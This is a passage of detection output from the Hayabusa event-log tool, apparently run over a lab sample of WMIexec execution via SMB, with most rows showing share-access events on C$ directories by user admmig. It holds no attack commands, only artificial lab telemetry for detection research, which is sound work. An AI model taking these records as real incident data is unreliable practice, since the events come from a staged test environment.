Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 
